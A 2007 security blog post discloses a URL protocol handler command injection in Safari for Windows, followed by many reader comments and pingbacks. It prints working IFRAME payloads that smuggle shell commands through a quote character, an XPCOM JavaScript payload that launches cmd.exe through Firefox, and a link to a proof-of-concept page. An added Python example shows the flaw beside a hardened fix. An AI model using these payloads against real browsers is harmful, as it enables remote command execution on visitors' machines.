Apple released version 3 of their popular Safari web browser today, with the added twist of offering both an OS X and a Windows version. Given that Apple has had a lousy track record with security on OS X, in addition to a hostile attitude towards security researchers, a lot of people are expecting to see quite a number of vulnerabilities targeted towards this new Windows browser.
I downloaded and installed Safari for Windows 2 hours ago, when I started writing this, and I now have a fully functional command execution vulnerability, triggered without user interaction simply by visiting a web site. I will not sell this one to ZDI or iDefense but instead release it here, as I have done lately with a number of 0day vulnerabilities. This place is where you get my latest research.
A bunch of other security researchers such as David Maynor and Aviv Raff have been pounding Safari for Windows with their fuzzing tools, going through thousands upon thousands of test pages in the hopes of triggering some form of memory corruption for potential exploitation. I am a big fan of fuzzing and believe it can produce some tremendous results, but sometimes good old-fashioned application-specific knowledge can get you far.
The logic behind this vulnerability is quite simple and the vulnerability class has been known and understood for years, namely that of protocol handler command injection. A browser typically supports a multitude of different URL schemes, some of which are handled by internal functions and others of which are handed off to external applications. On the OS X platform Apple has enjoyed the same luxury and the same curse as Internet Explorer has had on the Windows platform, namely intimate operating system knowledge. The integration with the originally intended operating system is tightly defined, but the breadth of knowledge is crippled when the software is released on other systems, and mistakes and mishaps occur. You can still find references to the OS X proprietary URL protocols open-help-anchor: and network-diagnostics: inside the resource files for the Windows release.
URL protocol handlers on the Windows platform work by executing a process with specific command line arguments. When Apple released Safari for the Windows platform they neglected to implement a proper level of input validation for these arguments, which means that you can break out of the intended confines and wreak havoc. A typical request for a URL such as myprotocol://someserver.com/someargument would be turned into a command line resembling the following.
"C:\Program Files\My Application\myprotocol.exe" "someserver.com/someargument"
This works almost as expected in Safari. With a simple link you cannot pass along arbitrary characters to the command line which is later executed, and most attempts at doing so will simply be URL escaped, such that myprotocol://someserver.com/some"[SPACE]argument is turned into
"C:\Program Files\My Application\myprotocol.exe" "someserver.com/some"%20argument
This cannot be used to exploit Safari as the command line to be executed is simply invalid. However, Safari does not properly validate the input when these same requests are handled through IFRAME elements, such as
<iframe src='myprotocol://someserver.com" < foo > bar | foobar "arg1'></iframe>
which is turned into the following command line.
"C:\Program Files\My Application\myprotocol.exe" "someserver.com" < foo > bar | foobar "arg1"
As the knowledgeable reader might have noticed, we now have everything we need to implement an attack against the entire range of available URL protocol handlers on the Windows platform. We could pick the telnet or callto protocols and provide unfiltered input to an argument of our choice. For this demonstration I have opted to attempt an exploit against the gopher: URL protocol, which is handled by my local Firefox installation. We hash together an example request...
<iframe src='gopher://larholm.com" |cmd /c echo "FOO'></iframe>
...fire up Process Explorer (procexp), launch Safari and watch the output.
"C:\PROGRA~1\MOZILL~3\FIREFOX.EXE" -url "gopher://larholm.com" |cmd /c echo "FOO" -requestPending
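As an added example (constructed here, not Safari's or Apple's code), the following Python models the naive template substitution described above and puts a hardened builder beside it; HANDLER_EXE is the placeholder path the page uses, and naive_cmdline, breaks_out and hardened_cmdline are my own names.

```python
# Added example: models the protocol-handler argument flaw described above
# and shows a hardened construction beside it. Constructed code, not Safari's.
import re
import subprocess
from urllib.parse import quote

# A handler command of the kind the OS registers for a URL scheme. The
# executable path is the placeholder used on the page, not a real product.
HANDLER_EXE = r"C:\Program Files\My Application\myprotocol.exe"
HANDLER_TEMPLATE = f'"{HANDLER_EXE}" "%1"'

# Characters that change how cmd.exe reads a command line once they sit
# outside the quoted argument: quote-break, redirection, pipe, chaining,
# the cmd escape character and line breaks.
CMDLINE_META = re.compile(r'["<>|&^\r\n]')


def naive_cmdline(url: str) -> str:
    """The flawed construction: paste the URL into the template untouched.
    A double quote inside the URL closes the argument early and everything
    after it is parsed by the shell as further commands."""
    return HANDLER_TEMPLATE.replace("%1", url)


def breaks_out(url: str) -> bool:
    """Defender's check: does this URL carry characters that would alter the
    command line's structure? Use it to reject or log such requests."""
    return CMDLINE_META.search(url) is not None


def hardened_cmdline(url: str) -> str:
    """Defensive construction: percent-encode everything a URL may not carry
    raw (including the quote, redirection and pipe characters), then build
    the command line with the argv-quoting rules rather than string pasting.
    Launching with subprocess.Popen([HANDLER_EXE, encoded]) would likewise
    pass the URL as a single argument without any shell parsing."""
    if "\0" in url:
        raise ValueError("NUL byte in URL")
    encoded = quote(url, safe=":/?#@!$'()*+,;=")
    return subprocess.list2cmdline([HANDLER_EXE, encoded])


if __name__ == "__main__":
    # Constructed inputs: the benign case from the page and the gopher/echo
    # request the page feeds through an IFRAME.
    for url in ("myprotocol://someserver.com/someargument",
                'gopher://larholm.com" |cmd /c echo "FOO'):
        print("naive:   ", naive_cmdline(url))
        print("breaks:  ", breaks_out(url))
        print("hardened:", hardened_cmdline(url))
```

In the hardened form the quote becomes %22, so the IFRAME request reaches the handler as one opaque argument instead of being split at the quote.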
Now this might be fun enough, but what if we wanted something a bit more customizable? Firefox is built on top of the Mozilla XPCOM platform and we might as well use some of these capable interfaces at our disposal to handle process instantiation. The code we want to execute is the following.
// XPCOM: obtain an nsILocalFile for cmd.exe and launch it through nsIProcess
C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:\\windows\\system32\\cmd.exe');
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,{},0); // blocking=true, no arguments
alert(process);
Due to the levels of URL escaping the following might be a bit confusing to read, but feel free to dissect it for your own variations.
<iframe src='gopher://larholm.com" -chrome "javascript:C=Components.classes;I=Components.interfaces;
file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
file.initWithPath('C:'+String.fromCharCode(92)
+String.fromCharCode(92)+'Windows'
+String.fromCharCode(92)+String.fromCharCode(92)+'System32'
+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');
process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
process.init(file);
process.run(true,{},0);alert(process)'></iframe>
And there you have it, command execution. A fully functional PoC exploit is located below. Warning: This WILL crash your Safari browser on Windows. Close any existing Firefox processes that you might currently be running, then navigate Safari to the following page.
http://www.larholm.com/vuln/safaripoc.html
The PoC above exploits Safari by bouncing through Firefox via the Gopher protocol, passing unfiltered input to the -chrome argument that Firefox exposes. Once there it launches C:\Windows\System32\cmd.exe with whatever arguments have been specified in the call to the process.run method.
It is important to know that, even though this PoC exploit uses Firefox, the actual vulnerability is within the lack of input validation for the command line arguments handed to the various URL protocol handlers on your machine. As such, there are a lot of different attack vectors for this vulnerability, I simply chose Firefox and the Gopher URL protocol because I was familiar with these.
I hope you enjoyed the fruits of my 2 hours of labour. Please feel free to add my RSS feed to your reader and come back again tomorrow or next week for a fresh batch of 0day vulnerabilities.
Cheers
Thor Larholm
UPDATE
The site was down for a couple of hours due to Slashdot, TechMeme and Reddit.

You might want to consider disabling the smart quote BS for posts that contain code fragments, as it is sort of hard to decipher what “C:\PROGRA~1\MOZILL~3\FIREFOX.EXE” -url “gopher://larholm.com” |cmd /c echo “FOO” results in - e.g. what happens to the cmd that is unmentioned in the accompanying text…
[…] Bah. Hardly a day has gone by and the bugs are coming out to roost. Larholm.com - Me, myself and I ? Safari for Windows, 0day exploit in 2 hours And here is one from Maynor (the guy who Apple vilified). He says he isn’t going to report […]
Yes, Windows sucks. No safety at all.
It’s not clear to me whether one should ding the browser or the OS for this one. OS X has the same problem, albeit with the potential at least of being somewhat safer as the normal UNIX “exec” runs programs without passing through shell argument evaluation.
It should not be the browser’s responsibility to keep track of which applications are safe to use as protocol handlers and which should be avoided. Either the operating system needs to provide an API for finding or calling protocol handlers that are designed to handle untrusted requests, or the browser should maintain its own database of such safe protocol handlers and ignore the database provided by the operating system.
I suggested that this be fixed on OS X, at least, back in 2004: http://www.scarydevil.com/~peter/io/osx-security.html
Of course, Microsoft’s been sitting on far more serious design flaws since 1997, so I honestly don’t expect Apple to act on this one until at LEAST the end of the decade. If at all.
[…] Larholm?????????URL protocol handler command injection vulnerability???????????????? bug Safari windows ??? Jun 12, 2007 - […]
[…] well,i dont see any reason to replace FF. It crashed couple of times already.. Larholm.com - Me, myself and I ? Safari for Windows, 0day exploit in 2 hours Safari for Windows: Released and hacked in a day | InfoWorld | News | 2007-06-11 | By Robert […]
[…] according to here and here (found via Slashdot), 4 DoS bugs were found in the Windows version just hours after its release […]
[…] before using this product on Windows, it is worth reading the article saying that he managed to find a bug in Safari for Windows within 2 hours of its release. If you are still in doubt, it is better to wait for a patch from Apple (oh, and on a MacBook “patch” […]
[…] URL protocol handler command injection vulnerability […]
I don’t know, the way you described it seems more like a hole in the way Windows handles things than a Safari hole. Does a Windows API call launch a shell process, or does Safari manually go and run a command line program? If it’s the Windows API for URL handling, then it’s clearly broken. Every program that needs to grab a URL should not be responsible for patching holes in Windows.
[…] 2: Thor Larholm has discovered a 0 day exploit in Safari within 2 hours of installing. Posted by Funtime on Tuesday, June 12, 2007, at 12:00 […]
Nice work! Both the thorough description and the fact that you decided to reveal it rather than just saying “nah-nah Apple, I pwnd ur borwser”. Should be interesting to see their reaction (and reaction time) on this.
Wow, amazing
I don’t like Safari on XP anyway, some pages don’t even render correctly… whatever. Thanks for the tip, I’m staying on Opera 
[…] ”. Same way of operating, different person: two hours after the release Thor Larholm published an interesting article demonstrating that Safari is affected by a vulnerability of the class “URL protocol handler command […]
[…] Maybe if I read this beforehand I would have second thought about installing it… or maybe not. […]
really good stuff, thanks for your effort. Safari wasn’t careful enough to filter out improper inputs..and u proved it.cheers!
safaripoc.html crashes Safari 3 on Mac OS X too
[…] Thor Larholm found a bug that lets attackers execute arbitrary program code and thereby gain control over someone else’s Windows system. Merely visiting a prepared web page is enough. […]
Your exploit crashes Safari 3 beta on the Mac too (and opens Firefox)
[…] More on this here: larholm.com […]
[…] Errata Security managed to find 6 bugs in one afternoon, one of which they were able to weaponize. Thor Larholm has created a means of remote executing any code he desires, in a mere 2 […]
[…] on the other hand Thor Larholm found a code injection vulnerability in the URL protocol handler, which also allows remote execution of […]
[…] Two hours in, the first exploit appeared. […]
Well… I’m not very surprised about this exploit - it’s a beta. But on the other hand it suckz alot that Apple released it that early. I wouldn’t recommend installing it anyway on Windows until it’s final.
[…] Safari coming to Windows (but apparently it has serious security flaws in its current state. More about that here, here and here). […]
[…] the same time Thor Larholm found a URL protocol handler command injection […]
[…] give it a whirl—if you have the time and the system resources. Always be on the lookout for security threats, […]
it crashes safari on the mac as well
Apple software just works, doesn’t it?
Safari 3 Beta for Windows XP & Vista…
I prefer to wait for the final release version in October to know whether Safari is the faster web browser. For the time being, I’ll use a Safari theme on Firefox…
[…] has released a brand new version of their Safari browser, and it only took 2 hours for someone to hack an exploit out for it. There are some good reviews around as to what makes the software so compelling, but you […]
It doesn’t crash Safari 2.0.4 (latest) on the Mac, but it opens Firefox nonetheless.
[…] just 2 hours is all it took for the first security hole in the Windows version of Safari 3 to be found. And then someone says again that Apple software […]
[…] Larholm.com […]
[…] 4: Thor Larholm has also found a bug. http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/ I’d like to note that we found a total of 6 bugs in an afternoon, 4 DoS and 2 remote code […]
[…] Sources: Errata Security | Larholm.com […]
[…] No sooner do I mention Safari on Windows and Niall goes off and finds someone’s zero day exploit […]
[…] 12 June 2007: Several security vulnerabilities have already been identified in the Safari/PC beta, so if you are […]
Mmhh, there is a EULA
IMPORTANT NOTE: THIS IS “BETA”, PRE-RELEASE, TIME-LIMITED SOFTWARE MEANT FOR EVALUATION AND DEVELOPMENT PURPOSES ONLY. THIS SOFTWARE SHOULD NOT BE USED IN A COMMERCIAL OPERATING ENVIRONMENT OR WITH IMPORTANT DATA. BEFORE INSTALLING THIS APPLE SOFTWARE, YOU SHOULD BACK UP ALL OF YOUR DATA AND REGULARLY BACK UP DATA WHILE USING THIS APPLE SOFTWARE.
Which pretty much implies it is risky to use the software. I usually do not see this in the standard software downloads.
They call it beta?
They will be thankful for your testing, even though they will not answer you. Free job for Apple you do?
Not that I am against you. Just pointing out my feelings.
Pedro.
[…] security hole found in the Windows version of Safari, Apple is insecure […]
[…] Links: - Safari Beta 3 Download - Safari Beta 3 Plugins (Win) - The Keynote - 0Day Exploit for Safari Windows […]
EULAs are there to cover themselves legally (which is good sense) but when you read the marketing drivel.
“Now you can enjoy worry-free web browsing on any computer. Apple engineers designed Safari to be secure from day one.”
they are kinda asking for it.
[…] (left) has released an advisory with proof-of-concept code to demo the vulnerability, which can be used to take complete control of […]
Hey, fine to know that my Safari is running on OS X which is the most secure Operating System ever!!!!
NOT!!!
[…] Safari for Windows, 0day exploit in 2 hours [Larholm.com] […]
Only Jobs wannabe fanboys will even try this.
Who gives a flying xxxx what apple does?
[…] Aviv Raff was the first. Then it was David Maynor’s and Thor Larholm’s turn.. […]
[…] vulnerabilities (4 DoS and 2 remote execution) within a few hours of launch. Confirmation comes from several independent sources, confirming the truth of the report that Safari for Windows was not born […]
[…] Report on security bugs in Apple’s browser Safari for Windows XP and Windows Vista: Link. Link to the security expert: Thor Larholm. Link to the Apple Safari exploit: Link […]
[…] veteran security researcher Thor Larholm writes in his blog he found a 0day vulnerability within two hours. The flaw exists within how Safari handles URL […]
[…] Well, the Safari browser for Windows was released yesterday and so far in less than 24 hours there have been several bugs discovered. (ex. 2) (ex. 3) […]
[…] but what strikes me in particular are the security holes, which are glaring on Windows. Thor Larholm, for instance, managed to find a hole after just 2 hours with which attackers can run arbitrary code on the system […]
[…] Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious […]
[…] Thor Larholm who described himself as “a pretty ordinary guy from a small town in Denmark”, also downloaded and installed Safari for Windows on his PC. After a few hours of testing he found a serious bug: “I now have a fully functional command execution vulnerability, triggered without user interaction simply by visiting a web site.” […]
[…] Already someone has found a massive hole in Safari. Read more about it at larholm.com […]
[…] already 6 zero day exploits and many, many crashes for the browser. You can read about them here here here and here. Which makes the following image from the Apple website, borrowed from […]
[…] Oh, Safari? Yes! Safari 3 of course comes with Mac OS X 10.5 and also for Windows XP and Vista. Available for download right away as a snapshot (officially a public beta) for Windows. Still very unstable, though, and it crashes just opening Google… apparently there are problems with the German language or fonts. Security holes were also discovered in Safari for Windows just 2 hours later. […]
[…] a beta of Safari for Windows (I knew it! They’re porting iLife to Windows.). Guess what. Someone found a security exploit in only two hours. Can you believe that? Oh well, it’s a beta after all. digg_url = […]
[…] Aviv Raff, through basic security tests, found a memory corruption flaw that can be exploited by malicious users. And that’s not all: a few hours later, more flaws were discovered. […]
[…] Finally, one more warning to users, particularly those on Windows Vista, who eventually manage to get this beta version of Safari installed and working: it seems that security leaves a great deal to be desired! […]
Good research, but what’s with this “lousy track record” and “hostile to exploits” BS? Come on man, lose the chip on the shoulder - it just looks unprofessional.
[…] Raff (Bugtraq ID: 24431). Apple Safari for Windows Memory Corruption Vulnerability by David Maynor. Apple Safari for Windows URL Protocol Handler Command Injection by Thor […]
[…] Kriptópolis I read that in only two hours Thor Larholm has cracked Safari 3 for Windows, after finding that this browser does not properly validate the input that reaches it through elements […]
[…] reports indicating that the browser presents a security risk to Windows users. Thor Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious […]
[…] security researcher Thor Larholm wrote in his blog that he found a “0day” vulnerability in Safari within two hours. The flaw exists in how […]
[…] June 12th, 2007 [link][more] […]
[…] separate reports indicating that the browser presents a security risk to Windows users.Thor Larholm has published a 0day exploit that causes Safari to shut down when visiting a site with malicious code.David […]
[…] the new browser, officially still on beta-3, may not be as good as others. A zero-day exploit was revealed in a mere two hours. Another bug was also discovered within a short period. These make IE look […]
[…] people have not only found major bugs (which is expected from a beta), but also possibly exploitable bugs that could have major security […]
[…] famous crashes and two allowing remote code execution. As these things come in threes, Thor Larholm (whose blog I cannot open at the time of this post) focused on exactly the same […]
[…] Webbrowser now publicly available for beta testing. Some people downloaded it and it took them 2 hours to get a serious security hole which lets Safari execute any program you’d like. […]
[…] getting some criticism over security flaws made not so far after the release. Thor Larholm found a 0 day exploit that causes Safari to shut down whenever you visit a website containing the malicious code. David […]
[…] Thor Larholm […]
[…] of Safari for Windows that would allow remote code execution. Likewise Thor Larholm found yet another. It seems the folks in Cupertino did not have much time to validate the security of the new […]
[…] Maynor reports 6 bugs discovered in a few hours, 4 of which are DoS and 2 remote execution, while Thor Larholm has published an exploit that closes the browser when visiting a page that exploits a further […]
[…] here and […]
[…] its release, there are already exploits circulating for Safari for Windows. Thor Larholm has discovered a remote command execution vulnerability and some other researchers have reportedly discovered more […]
[…] Safari on Windows for long and it is not that stable. It seems it isn’t very secure either, given that Thor Larholm found, only two hours after launch, a […]
[…] for full coverage. The main thing now is the bugs discovered in Safari for Windows. Thor Larholm at larholm.com found two within hours after the speech. David Maynor at Errata Security found six. At […]
[…] keeping track of a few announcements across the web, including a fully disclosed 0-day exploit that Thor Larholm apparently found yesterday within two hours of the software’s release (and says more are […]
[…] was released. David found 4 DoS bugs and 2 remote execution vulnerabilities, meanwhile Thor found a URL protocol handler command injection vulnerability that allows remote command execution and he wrote it up with a full description of the bug. If you […]
[…] An exploit has been found in the beta. Don’t use this for casual […]
[…] 2 Besides rendering errors, bug reports are piling up as well. Thor Larholm claims to have a 0day exploit for Safari 3 just two hours after the release […]
Breaking stuff again, eh? :p
[…] hours later, Thor Larholm found a vulnerability which allows command execution to be run […]
[…] Safari for Windows, 0day exploit in 2 hours […]